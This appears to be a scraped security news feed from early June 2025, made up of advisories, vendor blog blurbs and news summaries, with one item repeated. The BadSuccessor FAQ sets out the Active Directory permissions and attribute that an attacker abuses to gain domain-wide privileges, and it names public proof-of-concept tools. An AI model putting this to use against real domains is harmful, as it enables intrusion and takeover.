Multiple vulnerabilities were identified in RedHat Linux Kernel. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition, elevation of privilege, security restriction bypass and sensitive information disclosure on the targeted system. Impact Denial of Service Elevation of Privilege Security Restriction Bypass Information Disclosure System / Technologies affected Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 10.0 aarch64 Red Hat CodeReady Linux Builder for ARM 64 10 aarch64 Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 10.0 s390x Red Hat CodeReady Linux Builder for IBM z Systems 10 s390x Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 10.0 ppc64le Red Hat CodeReady Linux Builder for Power, little endian 10 ppc64le Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 10.0 x86_64 Red Hat CodeReady Linux Builder for x86_64 10 x86_64 Red Hat Enterprise Linux for ARM 64 - 4 years of updates 10.0 aarch64 Red Hat Enterprise Linux for ARM 64 - Extended Update Support 10.0 aarch64 Red Hat Enterprise Linux for ARM 64 10 aarch64 Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 10.0 s390x Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 10.0 s390x Red Hat Enterprise Linux for IBM z Systems 10 s390x Red Hat Enterprise Linux for Power, little endian - 4 years of support 10.0 ppc64le Red Hat Enterprise Linux for Power, little endian - Extended Update Support 10.0 ppc64le Red Hat Enterprise Linux for Power, little endian - Extended Update Support 8.8 ppc64le Red Hat Enterprise Linux for Power, little endian - Extended Update Support 9.4 ppc64le Red Hat Enterprise Linux for Power, little endian 10 ppc64le Red Hat Enterprise Linux for Power, little endian 8 ppc64le Red Hat Enterprise Linux for x86_64 - 4 years of updates 10.0 x86_64 Red Hat Enterprise Linux for x86_64 - Extended Update Support 10.0 x86_64 Red Hat Enterprise Linux for x86_64 - Extended Update Support 8.8 x86_64 Red Hat Enterprise Linux for x86_64 - Extended Update Support 9.4 x86_64 Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.6 x86_64 Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.8 x86_64 Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.0 x86_64 Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.2 x86_64 Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.4 x86_64 Red Hat Enterprise Linux for x86_64 10 x86_64 Red Hat Enterprise Linux for x86_64 8 x86_64 Red Hat Enterprise Linux Server - AUS 9.2 x86_64 Red Hat Enterprise Linux Server - AUS 9.4 x86_64 Red Hat Enterprise Linux Server - TUS 8.8 x86_64 Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.6 ppc64le Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.8 ppc64le Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.0 ppc64le Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.2 ppc64le Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.4 ppc64le Solutions Before installation of the software, please visit the vendor web-site for more details.   Apply fixes issued by the vendor: https://access.redhat.com/errata/RHSA-2025:8342 https://access.redhat.com/errata/RHSA-2025:8344 https://access.redhat.com/errata/RHSA-2025:8345 https://access.redhat.com/errata/RHSA-2025:8346 https://access.redhat.com/errata/RHSA-2025:8347 https://access.redhat.com/errata/RHSA-2025:8374 https://access.redhat.com/errata/RHSA-2025:8399

https://www.hkcert.org/security-bulletin/redhat-linux-kernel-multiple-vulnerabilities_20250603
Android Multiple Vulnerabilities
2025-06-03T01:00:00Z | 1748912400

Multiple vulnerabilities were identified in Android. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition, elevation of privilege and sensitive information disclosure on the targeted system.   Impact Denial of Service Elevation of Privilege Information Disclosure System / Technologies affected Android security patch level prior to 2025-06-05 Solutions Before installation of the software, please visit the vendor web-site for more details. Apply fixes issued by the vendor: https://source.android.com/docs/security/bulletin/2025-06-01

https://www.hkcert.org/security-bulletin/android-multiple-vulnerabilities_20250603
APAC DNS Forum 2025
2025-06-03T00:30:00Z | 1748910600

Peter Lowe, FIRST’s DNS Abuse Policy Ambassador, shares a review of the APAC DNS Forum in Hanoi, Vietnam, where he met with representatives from various organizations and had valuable discussions about DNS abuse and data sharing.

https://www.first.org/blog/20250603-APAC-DNS-Forum-2025
APAC DNS Forum 2025
2025-06-03T00:30:00Z | 1748910600

Peter Lowe, FIRST’s DNS Abuse Policy Ambassador, shares a review of the APAC DNS Forum in Hanoi, Vietnam, where he met with representatives from various organizations and had valuable discussions about DNS abuse and data sharing.

https://www.first.org/blog/20250603-APAC-DNS-Forum-2025
Parallels Desktop prl_vmarchiver Unarchive Hard Link Privilege Escalation
2025-06-03T00:00:00Z | 1748908800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2126
Parallels Desktop prl_packer_inplace PVMP Unpack Directory Traversal Privilege Escalation
2025-06-03T00:00:00Z | 1748908800

https://talosintelligence.com/vulnerability_reports/TALOS-2025-2160
Parallels Desktop prl_disp_service Snapshots SymLink Change Ownership Privilege Escalation
2025-06-03T00:00:00Z | 1748908800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2123
Parallels Desktop prl_disp_service Snapshots.xml Hard Link Privilege Escalation
2025-06-03T00:00:00Z | 1748908800

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2124
Multiples vulnérabilités dans les produits Splunk (03 juin 2025)
2025-06-03T00:00:00Z | 1748908800

De multiples vulnérabilités ont été découvertes dans les produits Splunk. Certaines d'entre elles permettent à un attaquant de provoquer une atteinte à la confidentialité des données, une injection de code indirecte à distance (XSS) et un contournement de la politique de sécurité.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0473/
Multiples vulnérabilités dans Google Chrome (03 juin 2025)
2025-06-03T00:00:00Z | 1748908800

De multiples vulnérabilités ont été découvertes dans Google Chrome. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur. Google indique que la vulnérabilité CVE-2025-5419 est activement exploitée.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0471/
Multiples vulnérabilités dans Google Android (03 juin 2025)
2025-06-03T00:00:00Z | 1748908800

De multiples vulnérabilités ont été découvertes dans les produits Google. Elles permettent à un attaquant de provoquer une élévation de privilèges, un déni de service à distance et une atteinte à la confidentialité des données.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0472/
K000138264: SSH vulnerability CVE-2023-48795
2025-06-02T23:51:06Z | 1748908266

Security Advisory Description The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such ...

https://my.f5.com/manage/s/article/K000138264
Open-Weight Chinese AI Models Drive Privacy Innovation in LLMs
2025-06-02T22:22:22Z | 1748902942

Edge computing and stricter regulations could usher in a new era of AI privacy.

https://www.darkreading.com/cyber-risk/open-weight-chinese-ai-models-drive-privacy-innovation-llm
How Good Are the LLM Guardrails on the Market? A Comparative Study on the Effectiveness of LLM Content Filtering Across Major GenAI Platforms
2025-06-02T22:00:26Z | 1748901626

We compare the effectiveness of content filtering guardrails across major GenAI platforms and identify common failure cases across different systems. The post How Good Are the LLM Guardrails on the Market? A Comparative Study on the Effectiveness of LLM Content Filtering Across Major GenAI Platforms appeared first on Unit 42.

https://unit42.paloaltonetworks.com/comparing-llm-guardrails-across-genai-platforms/
Broadcom ends business with VMware’s lowest-tier channel partners
2025-06-02T21:43:04Z | 1748900584

Broadcom claims many eliminated partners weren't doing any VMware business.

https://arstechnica.com/information-technology/2025/06/broadcom-ends-business-with-vmwares-lowest-tier-channel-partners/
EMR-ISAC Shuts Down: What Happens Now?
2025-06-02T21:28:37Z | 1748899717

This information-sharing hub provided essential information to the emergency services sector on physical and cyber threats. Some say the timing is concerning.

https://www.darkreading.com/threat-intelligence/emr-isac-shuts-down-what-now
Exploitation Risk Grows for Critical Cisco Bug
2025-06-02T21:20:59Z | 1748899259

New details on the Cisco IOS XE vulnerability could help attackers develop a working exploit soon, researchers say.

https://www.darkreading.com/vulnerabilities-threats/exploitation-risk-grows-critical-cisco-bug
Public-private partnerships need more ‘efficiency,’ Energy official says
2025-06-02T21:07:00Z | 1748898420

The agency’s national labs can offer high performance computing capabilities for artificial intelligence innovation, several leaders noted, but it requires an expedited negotiation process.

https://www.nextgov.com/artificial-intelligence/2025/06/public-private-partnerships-need-more-efficiency-energy-official-says/405746/
Securing the Quantum Frontier: S Ventures’ Investment in Infleqtion
2025-06-02T21:00:25Z | 1748898025

S Ventures invests in the next era of computing through our partnership with Infleqtion, a pioneering leader securing against quantum threats.

https://www.sentinelone.com/blog/securing-the-quantum-frontier-s-ventures-investment-in-infleqtion/
White House budget request includes $45 million in additional DOGE funding
2025-06-02T20:46:00Z | 1748897160

The request would support an estimated 150 full time employees, 80% of whom would be paid out of agency reimbursements, rather than DOGE-specific funds.

https://www.nextgov.com/policy/2025/06/white-house-budget-request-includes-45-million-doge-funding/405744/
Ukrainians smuggle drones hidden in cabins on trucks to strike Russian airfields
2025-06-02T20:04:19Z | 1748894659

A real-world Trojan Horse attack Ukraine claims it launched a cunning drone strike on Sunday against multiple Russian airbases, hitting over 40 military aircraft and inflicting an estimated $7 billion in damage, in an operation dubbed "Spiderweb."

https://go.theregister.com/feed/www.theregister.com/2025/06/02/ukrainian_drones_russia_bombing/
HPE security advisory (AV25-310)
2025-06-02T19:52:42Z | 1748893962

HPE security advisory (AV25-310)

https://cyber.gc.ca/en/alerts-advisories/hpe-security-advisory-av25-310
Trickbot, Conti Ransomware Operator Unmasked Amid Huge Ops Leak
2025-06-02T19:00:52Z | 1748890852

An anonymous whistleblower has leaked large amounts of data tied to the alleged operator behind Trickbot and Conti ransomware.

https://www.darkreading.com/cyberattacks-data-breaches/trickbot-conti-ransomware-operator-unmasked
DOJ CIO announces departure from agency
2025-06-02T18:50:00Z | 1748890200

Melinda Rogers said May 30 was her last day with the Department of Justice.

https://www.nextgov.com/people/2025/06/doj-cio-announces-departure-agency/405735/
Roundcube security advisory (AV25-309)
2025-06-02T18:26:56Z | 1748888816

On June 1, 2025, Roundcube published security advisories to address vulnerabilities.

https://cyber.gc.ca/en/alerts-advisories/roundcube-security-advisory-av25-309
NSO appeals WhatsApp decision, says it can’t pay $168 million in ‘unlawful’ damages
2025-06-02T18:05:26Z | 1748887526

Spyware maker NSO Group asked a federal judge to reduce the damages it owes to WhatsApp in a case involving 1,400 infected phones, or set up a new trial.

https://therecord.media/nso-group-appeals-jury-award-168million-
K000151645: SQLite vulnerability CVE-2025-3277
2025-06-02T18:01:30Z | 1748887290

Security Advisory Description An integer overflow can be triggered in SQLite’s `concat_ws()` function. The resulting, truncated integer is then used to allocate a buffer. When SQLite then writes ...

https://my.f5.com/manage/s/article/K000151645
House AI Task Force member optimistic Congress will move on group’s recs later this year
2025-06-02T18:01:00Z | 1748887260

The bipartisan House AI Task Force’s recommendations provide “a great running start” for Congress to establish guardrails around the safe use of emerging technologies, the lawmaker said.

https://www.nextgov.com/artificial-intelligence/2025/06/house-ai-task-force-member-optimistic-congress-will-move-groups-recs-later-year/405730/
Frequently Asked Questions About BadSuccessor
2025-06-02T17:55:18Z | 1748886918

Frequently asked questions about “BadSuccessor,” a zero-day privilege escalation vulnerability in Active Directory domains with at least one Windows Server 2025 domain controller.BackgroundTenable’s Research Special Operations (RSO) and the Identity Content team has compiled this blog to answer Frequently Asked Questions (FAQ) regarding a newly disclosed zero-day in Active Directory called BadSuccessor.FAQWhat is BadSuccessor?BadSuccessor is the name of a zero-day privilege escalation vulnerability in Active Directory that was discovered and disclosed by Yuval Gordon, a security researcher at Akamai.According to Gordon, the flaw exists in delegated Managed Service Accounts (dMSAs), a service account type in Active Directory (AD) that was introduced in Windows Server 2025 to enable the migration of non-managed service accounts.What are the vulnerabilities associated with BadSuccessor?As of June 2, Microsoft had not assigned a CVE identifier for BadSuccessor. Microsoft is the CVE Numbering Authority (CNA) for its products. Since there are currently no patches available for BadSuccessor, no CVE has been assigned. If Microsoft does assign a CVE alongside patches for it, we will update this blog accordingly.How is BadSuccessor exploited?To exploit BadSuccessor, an attacker needs to be able to access a user account with specific permissions in AD, and at least one domain controller in the domain needs to be running Windows Server 2025.Based on Akamai’s research, even if an AD domain is not using dMSAs, nor operates at the 2025 functional level, all that is required is that a targeted user has either the permission to:Create a new dMSA (msDS-DelegatedManagedServiceAccount object class) in any container or organizational unit (OU)Abuse an existing dMSA by modifying its msDS-ManagedAccountPrecededByLink attributeWhen was BadSuccessor first disclosed?On May 21, Akamai published a blog post about BadSuccessor, which included a detailed overview of the flaw, as well as detection and mitigation guidance.How severe is BadSuccessor?BadSuccessor has the potential to be very severe, as exploitation could allow an attacker to achieve full domain, and then forest, compromise in an Active Directory environment. However, one mitigating factor is that it only affects domains with at least one Windows Server 2025 domain controller.How prevalent are AD domains with at least one Windows Server 2025 domain controller?Based on a subset of Tenable’s telemetry data, we found just 0.7% of AD domains have at least one Windows Server 2025 domain controller. This appears to be lower than other statistics we’ve seen reported.Was BadSuccessor exploited as a zero-day?As of June 2, there have been no indications that BadSuccessor has been exploited in the wild.Why is it called BadSuccessor?According to Gordon, the name “BadSuccessor” is tied to the fact that the user account (or dMSA) becomes the nefarious “successor” by inheriting the elevated privileges of another identity in the AD environment.6/ We named this attack BadSuccessor, because that's exactly what the dMSA becomes - the unintended heir to a high-privilege identity.A successor, with all the right keys.— Yuval Gordon (@YuG0rd) May 21, 2025Is there a proof-of-concept (PoC) available for BadSuccessor?Yes, there are several proofs-of-concept (PoCs) for BadSuccessor available on GitHub, including a.NET implementation called SharpSuccessor. It is also available in NetExec, the successor to the infamous CrackMapExec hack tool. It was also added to BloodyAD, the Active Directory privilege escalation framework.Are patches or mitigations available for BadSuccessor?As of June 2, there were no patches available for BadSuccessor. However, in the Akamai blog post from May 21, Microsoft indicated they would “fix this issue in the future.” If and when a patch becomes available, we will update this section.Akamai’s blog post includes details on detecting BadSuccessor as well as mitigation suggestions.Has Tenable released any product coverage for these vulnerabilities?While Microsoft has not yet released patches for BadSuccessor, Tenable Identity Exposure customers can utilize our recently released (v3.95) Indicator of Exposure (IoE) for BadSuccessor.Once Microsoft assigns a CVE and releases patches, we will update this section with additional Tenable coverage.Get more informationBadSuccessor: Abusing dMSA to Escalate Privileges in Active DirectoryJoin Tenable's Research Special Operations (RSO) Team on the Tenable Community.Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

https://www.tenable.com/blog/frequently-asked-questions-about-badsuccessor
The Ultimate 2025 List of Web Crawlers and Good Bots: Identification, Examples, and Best Practices
2025-06-02T17:43:01Z | 1748886181

The internet is full of bots. They generate almost as much traffic as people do.  But while many of them are malicious scrapers or spammy impostors, let’s not forget about the many “good” bots that serve legitimate functions, like indexing your content for Google search or generating preview cards when your link gets shared on […] The post The Ultimate 2025 List of Web Crawlers and Good Bots: Identification, Examples, and Best Practices appeared first on HUMAN Security.

https://www.humansecurity.com/learn/blog/crawlers-list-known-bots-guide/
Ditch the Glitches, Embrace Exceptional Voice and Video Experience with Versa Secure SD-WAN
2025-06-02T17:41:55Z | 1748886115

Are your real-time application performance needs met? These applications needs special attention that only a robust SD-WAN solution can deliver to always ensure an exceptional user experience. Learn how Versa Secure SD-WAN can help you achieve this goal seamlessly. The post Ditch the Glitches, Embrace Exceptional Voice and Video Experience with Versa Secure SD-WAN first appeared on The Versa Networks Blog.

https://versa-networks.com/blog/ditch-the-glitches-embrace-exceptional-voice-and-video-experience-with-versa-secure-sd-wan/
[Control systems] CISA ICS security advisories (AV25–308)
2025-06-02T17:30:59Z | 1748885459

[Control systems] CISA ICS security advisories (AV25–308)

https://cyber.gc.ca/en/alerts-advisories/control-systems-cisa-ics-security-advisories-av25-308
Vanta bug exposed customers’ data to other customers
2025-06-02T17:10:47Z | 1748884247

The compliance company said the customer data exposure was caused by a product change.

https://techcrunch.com/2025/06/02/vanta-bug-exposed-customers-data-to-other-customers/
How to Safeguard Healthcare Data in ITSM: Ivanti and Protecto
2025-06-02T17:00:31Z | 1748883631

The healthcare sector, perhaps more than any other, needs to scrutinize the balance between data utility and data privacy. Healthcare organizations must manage large amounts of sensitive data while complying with stringent regulations such as the Health Insurance Portability and Accountability Act (HIPAA). For IT teams seeking to implement AI-augmented service management, that responsibility weighs heavily.  A notable recent incident involved over four million customers affected by a data breach at Blue Cross Blue Shield, where Google Analytics had been configured in a manner that allowed member data to be shared with Google Ads, likely including protected health information. Forward-looking IT leaders want to take advantage of advanced IT service management capabilities to improve operational efficiency, including emerging AI applications. But to avoid becoming the latest headline, they also need the highest standards of data protection. In this article, we’ll go into how Ivanti integrates with Protecto to do just that. Where healthcare compliance and AI intersect The myriad regulations that healthcare organizations must follow (HIPAA, GDPR, CCPA and others) are designed to protect patient data and ensure that it is handled securely and ethically. Data security and privacy are fundamental aspects of patient trust, and noncompliance can result in significant fines and legal actions. At the same time, AI and ML technologies require access to large datasets – data that may include sensitive information that is subject to these stringent requirements. To add another layer of complexity, healthcare organizations are often large and complex, with multiple departments and locations, which means any data privacy solutions need to be able to scale without compromising performance. Healthcare requirements for ITSM IT organizations that want to take advantage of advanced ITSM use cases without fear of compromising data privacy have specific requirements – requirements that the integration between Ivanti Neurons for ITSM and Protecto deliver. Data masking Intelligent data masking identifies and masks sensitive information such as PII and PHI. This lets AI agents operate on data without exposing sensitive elements, preventing data leaks and reducing misuse. Additionally, data masking ensures that the context and utility of the information remain intact, enabling effective analysis and decision-making. Role-based access controls Role-based access controls and policy-driven unmasking ensure data is only accessed by authorized users with appropriate roles. Only users with the necessary permissions can access or unmask sensitive data. Audit trails To comply with regulations, healthcare organizations need a comprehensive audit trail of how sensitive data is accessed, used and protected. Detailed logs simplify compliance workflows and support regulatory audits. Seamless integration Protecto integrates with Ivanti APIs, which allows existing processes to remain uninterrupted – and for IT teams to deliver the best possible service – adding a layer of protection without disrupting operations. Scale A single instance of Protecto can support over 3,000 tenants, safeguarding the data of millions of users. It can handle large-scale deployments while maintaining operational resilience, making it a reliable choice for AI initiatives. Ivanti and Protecto’s partnership The partnership between Ivanti and Protecto brings immense value to Ivanti customers in highly regulated sectors with heightened data privacy concerns. Already available features such as custom masking policies, on-premises and private cloud alternatives, and improved audit logs and reports ensure customers can meet compliance requirements with confidence. Our commitment to research and development in AI, machine learning and data protection mean customers will always be at the forefront of managing large-scale datasets. Our work with healthcare organizations, regulatory bodies and technology partners helps customers put in place practical data protection solutions without compromising IT efficiency. Combining Ivanti Neurons for ITSM with advanced data security and privacy features ensures that our customers’ ITSM operations are both efficient and compliant with the most stringent guidelines, whether they’re in the healthcare industry or any other highly regulated field. Ivanti’s partner ecosystem Ivanti works with a wide range of technology partners like Protecto to help customers make the most of their investment in Ivanti solutions. To learn more, visit the Ivanti Partner Markeplace.

https://www.ivanti.com/blog/ivanti-protecto
Discover how automatic attack disruption protects critical assets while ensuring business continuity
2025-06-02T17:00:00Z | 1748883600

To help security teams protect critical assets while ensuring business continuity, Microsoft Defender developed automatic attack disruption: a built-in self-defense capability. The post Discover how automatic attack disruption protects critical assets while ensuring business continuity appeared first on Microsoft Security Blog.

https://techcommunity.microsoft.com/blog/microsoftdefenderatpblog/discover-how-automatic-attack-disruption-protects-critical-assets-while-ensuring/4416597
Enhancing DNS Security with Machine Learning
2025-06-02T17:00:00Z | 1748883600

We’re proud to announce that ThreatSTOP is now using Machine Learning (ML) to enhance the protections we deliver to our customers.

https://www.threatstop.com/blog/enhancing-dns-security-with-machine-learning
NSO Group asks judge for new trial, calling $167 million in damages ‘outrageous’
2025-06-02T16:38:02Z | 1748882282

The spyware maker claims the damages it was ordered to pay are "excessive," and that the jury wanted to “bankrupt” the company.

https://techcrunch.com/2025/06/02/nso-group-asks-judge-for-new-trial-calling-167-million-in-damages-outrageous/
Cryptojacking Campaign Exploits DevOps APIs Using Off-the-Shelf Tools from GitHub
2025-06-02T16:03:00Z | 1748880180

Cybersecurity researchers have discovered a new cryptojacking campaign that's targeting publicly accessible DevOps web servers such as those associated with Docker, Gitea, and HashiCorp Consul and Nomad to illicitly mine cryptocurrencies. Cloud security firm Wiz, which is tracking the activity under the name JINX-0132, said the attackers are exploiting a wide range of known misconfigurations and...

https://thehackernews.com/2025/06/cryptojacking-campaign-exploits-devops.html
IBM security advisory (AV25-307)
2025-06-02T16:02:18Z | 1748880138

IBM security advisory (AV25-307)

https://cyber.gc.ca/en/alerts-advisories/ibm-security-advisory-av25-307
Less TODO, more done: The difference between coding agent and agent mode in GitHub Copilot
2025-06-02T16:00:00Z | 1748880000

We’ll decode these two tools—and show you how to use them both to work more efficiently. The post Less TODO, more done: The difference between coding agent and agent mode in GitHub Copilot appeared first on The GitHub Blog.

https://github.blog/developer-skills/github/less-todo-more-done-the-difference-between-coding-agent-and-agent-mode-in-github-copilot/
Announcing a new strategic collaboration to bring clarity to threat actor naming
2025-06-02T16:00:00Z | 1748880000

Microsoft and CrowdStrike are teaming up to create alignment across our individual threat actor taxonomies to help security professionals connect insights faster. The post Announcing a new strategic collaboration to bring clarity to threat actor naming appeared first on Microsoft Security Blog.

https://www.microsoft.com/en-us/security/blog/2025/06/02/announcing-a-new-strategic-collaboration-to-bring-clarity-to-threat-actor-naming/
AI Emerges as the Top Concern for Security Leaders
2025-06-02T16:00:00Z | 1748880000

AI emerges as the top concern for security leaders, surpassing concerns of ransomware.

https://www.securitymagazine.com/articles/101662-ai-emerges-as-the-top-concern-for-security-leaders
ADC 4.2 Is Here: Flexible, Smarter SSL Handling for a Safer Network
2025-06-02T16:00:00Z | 1748880000

Let’s face it—managing encrypted traffic is no walk in the park. As businesses double down on security and privacy, SSL/TLS encryption is now everywhere. That’s great news for data protection, but it also means more complexity for traffic management and visibility. That’s exactly where ADC 4.2 steps in. This release brings a trio of powerful […] The post ADC 4.2 Is Here: Flexible, Smarter SSL Handling for a Safer Network appeared first on Hillstone Networks.

https://www.hillstonenet.com/blog/adc-4-2-is-here-flexible-smarter-ssl-handling-for-a-safer-network/
Australia Begins New Ransomware Payment Disclosure Rules
2025-06-02T15:50:22Z | 1748879422

The country will require certain organizations to report ransomware payments and communications within 72 hours after they're made or face potential civil penalties.

https://www.darkreading.com/threat-intelligence/australia-ransomware-payment-disclosure-rules
Critical Bugs Could Spark Takeover of Widely Used Fire Safety OT/ICS Platform
2025-06-02T15:46:01Z | 1748879161

The unpatched security vulnerabilities in Consilium Safety's CS5000 Fire Panel could create "serious safety issues" in environments where fire suppression and safety are paramount, according to a CISA advisory.

https://www.darkreading.com/vulnerabilities-threats/critical-bugs-takeover-fire-safety-ot-ics-platform
Job Quality & Capital
2025-06-02T15:42:18Z | 1748878938

As investors, ICA and Colorado Enterprise Fund have both incorporated job quality assessments as part of their lending and investment process. This conversation explores the various tools capital allocators possess to help and incentivize small businesses to create quality jobs for their employees. The post Job Quality & Capital appeared first on The Aspen Institute.

https://www.aspeninstitute.org/blog-posts/job-quality-and-capital/
Dell security advisory (AV25-306)
2025-06-02T15:38:06Z | 1748878686

Dell security advisory (AV25-306)

https://cyber.gc.ca/en/alerts-advisories/dell-security-advisory-av25-306
Announcing Graylog 6.3.0-Beta.4
2025-06-02T15:20:14Z | 1748877614

Announcing Graylog 6.3.0-beta.4 Graylog 6.3.0-beta.4 Release date: 2025-06-02 Upgrade notes DEB and RPM packages are available in our repositories Docker Compose Container images: Graylog Open Graylog Enterprise Graylog Data Node Tarballs for manual installation: Graylog Server Graylog Server (bundled JVM, linux-x64) Graylog Server (bundled JVM, linux-aarch64) Graylog Enterprise Server Graylog Enterprise Server (bundled JVM, linux-x64) […] The post Announcing Graylog 6.3.0-Beta.4 appeared first on Graylog.

https://graylog.org/post/announcing-graylog-6-3-0-beta-4/
Preinstalled Apps on Ulefone, Krüger&Matz Phones Let Any App Reset Device, Steal PIN
2025-06-02T15:12:00Z | 1748877120

Three security vulnerabilities have been disclosed in preloaded Android applications on smartphones from Ulefone and Krüger&Matz that could enable any app installed on the device to perform a factory reset and encrypt an application. A brief description of the three flaws is as follows - CVE-2024-13915 (CVSS score: 6.9) - A pre-installed "com.pri.factorytest" application on Ulefone and...

https://thehackernews.com/2025/06/preinstalled-apps-on-ulefone-kruger.html
Stopping BadSuccessor with the LDAP Firewall
2025-06-02T15:12:00Z | 1748877120

In recent years, the LDAP protocol has become an increasingly popular target for attackers looking to escalate privileges, move laterally, or persist inside Active Directory environments. As more researchers explore the depths of Microsoft’s legacy protocols, more vulnerabilities continue to surface — and many of them abuse LDAP in novel and unexpected ways.  Just in the past few years, we've seen a surge in LDAP-based attack techniques and vulnerabilities,…

https://zeronetworks.com/blog/stopping-badsuccessor-with-ldap-firewall
Announcing Graylog Forwarder 6.5-Beta.2
2025-06-02T15:11:04Z | 1748877064

Announcing Graylog Forwarder 6.5-Beta.2 This is a bug-fix release that improves Graylog Forwarder functionality. Please read on for information on what has changed. Download Links 6.5-beta.2 Release date: 2025-06-02 Operating system packages: DEB Package RPM Package Docker Compose Container image: Docker Hub docker pull graylog/graylog-forwarder:6.5-beta.2-1 Tarballs for manual installation: Graylog Forwarder   Changelog Graylog Forwarder […] The post Announcing Graylog Forwarder 6.5-Beta.2 appeared first on Graylog.

https://graylog.org/post/announcing-graylog-forwarder-6-5-beta-2/
Ubuntu security advisory (AV25-305)
2025-06-02T14:54:59Z | 1748876099

Ubuntu security advisory (AV25-305)

https://cyber.gc.ca/en/alerts-advisories/ubuntu-security-advisory-av25-305
AVCheck cyber crime service snared in police takedown
2025-06-02T14:53:36Z | 1748876016

Authorities have seized the domains of AVCheck, one of the largest counter antivirus services used by cybercriminals around the world

https://www.itpro.com/security/cyber-crime/avcheck-cyber-crime-service-snared-in-police-takedown
Red Hat security advisory (AV25-304)
2025-06-02T14:36:33Z | 1748874993

Red Hat security advisory (AV25-304)

https://cyber.gc.ca/en/alerts-advisories/red-hat-security-advisory-av25-304
Your KnowBe4 Compliance Plus Fresh Content Updates from May 2025
2025-06-02T14:30:00Z | 1748874600

Check out the May updates in Compliance Plus so you can stay on top of featured compliance training content.

https://blog.knowbe4.com/knowbe4-cmp-content-updates-may-2025
Qualcomm Fixes 3 Zero-Days Used in Targeted Android Attacks via Adreno GPU
2025-06-02T14:22:00Z | 1748874120

Qualcomm has shipped security updates to address three zero-day vulnerabilities that it said have been exploited in limited, targeted attacks in the wild. The flaws in question, which were responsibly disclosed to the company by the Google Android Security team, are listed below - CVE-2025-21479 and CVE-2025-21480 (CVSS score: 8.6) - Two incorrect authorization vulnerabilities in the Graphics...

https://thehackernews.com/2025/06/qualcomm-fixes-3-zero-days-used-in.html
CISA projected to lose a third of its workforce under Trump’s 2026 budget
2025-06-02T14:19:00Z | 1748873940

The White House’s latest spending proposal projects nearly 1,000 jobs will be slashed at the nation’s lead civilian cyber agency. Related cyber and intel programs across government also face funding rollbacks.

https://www.nextgov.com/cybersecurity/2025/06/cisa-projected-lose-third-its-workforce-under-trumps-2026-budget/405726/
5 Tips to Build Cloud Cyber Resilience
2025-06-02T14:16:56Z | 1748873816

Discover practical strategies to enhance cloud cyber resilience, ensuring your business operations remain secure and agile. Read the article to learn more. The post 5 Tips to Build Cloud Cyber Resilience appeared first on Fidelis Security.

https://fidelissecurity.com/threatgeek/cloud-security/cloud-cyber-resilience/
Making All Learning Count: Building a Skills-First Future for Everyone
2025-06-02T14:00:59Z | 1748872859

At the heart of a more equitable, dynamic, and resilient workforce lies a simple but profound idea: All learning should count, especially when skill attainment can be verified. Whether acquired in a classroom, on a factory floor, in the military, or through the sheer resilience of navigating life’s complexities, learning happens everywhere. People develop competencies—knowledge, […] The post Making All Learning Count: Building a Skills-First Future for Everyone appeared first on The Aspen Institute.

https://www.aspeninstitute.org/blog-posts/making-all-learning-count-building-a-skills-first-future-for-everyone/
Beyond the Broken Wall: Why the Security Perimeter Is Not Enough
2025-06-02T14:00:34Z | 1748872834

Organizations need to abandon perimeter-based security for data-centric protection strategies in today's distributed IT environments.

https://www.darkreading.com/endpoint-security/beyond-broken-wall-why-security-perimeter-not-enough
In the AI Race With China, Don't Forget About Security
2025-06-02T14:00:00Z | 1748872800

The US needs to establish a clear framework to provide reasonable guardrails to protect its interests — the quicker, the better.

https://www.darkreading.com/vulnerabilities-threats/ai-race-china-dont-forget-about-security
OpenText™ eDiscovery CE 25.2: Introducing eDiscovery Chronology for enhanced evidence organization
2025-06-02T13:58:34Z | 1748872714

We're excited to announce the latest update in OpenText eDiscovery CE 25.2, introducing a powerful new tool that transforms how legal teams organize and analyze evidence. Here's what's new: OpenText eDiscovery Chronology In modern litigation and investigations, organizing massive volumes of digital evidence chronologically to understand the who, what, where, and when of a matter can be daunting, labor-intensive, expensive, and potentially risky. The new OpenText™ eDiscovery Chronology addresses this challenge head-on.  This interactive chronological narrative building tool helps legal teams track, organize, and analyze evidence by date—with full control of event metadata and complete audit trail capabilities. With Chronology, legal teams can leverage technology to streamline an otherwise manual task and quickly gain a clearer understanding of the sequence of events that may make or break a case.  With integrated visual Chronology, legal teams can:  Easily identify potential gaps or inconsistencies in evidence earlier, reducing risks and unpleasant surprises  Save time by organizing events and facts without having to copy and paste text and link documents in Excel, Word, or third-party software  Quickly zero in on specific events or facts at any time, for faster, easier, and more thorough client reporting, early case assessment, and preparation for depositions, hearings, settlement discussions, and trial  Chronology is a key feature that has been frequently requested by our customers and represents a significant enhancement to our platform's capabilities. In addition to the new Chronology feature, OpenText continues to release enhancements to our existing capabilities.    OpenText eDiscovery Aviator Key Document Summary – Now exportable!  Initially released in April 2024, Aviator Key Document Summary empowers legal teams to create an AI-generated summary of key documents, complete with links to the documents, for improved document review efficiency and rapid insight into the case.  Now with CE 25.2, legal teams can more easily share document summaries with team 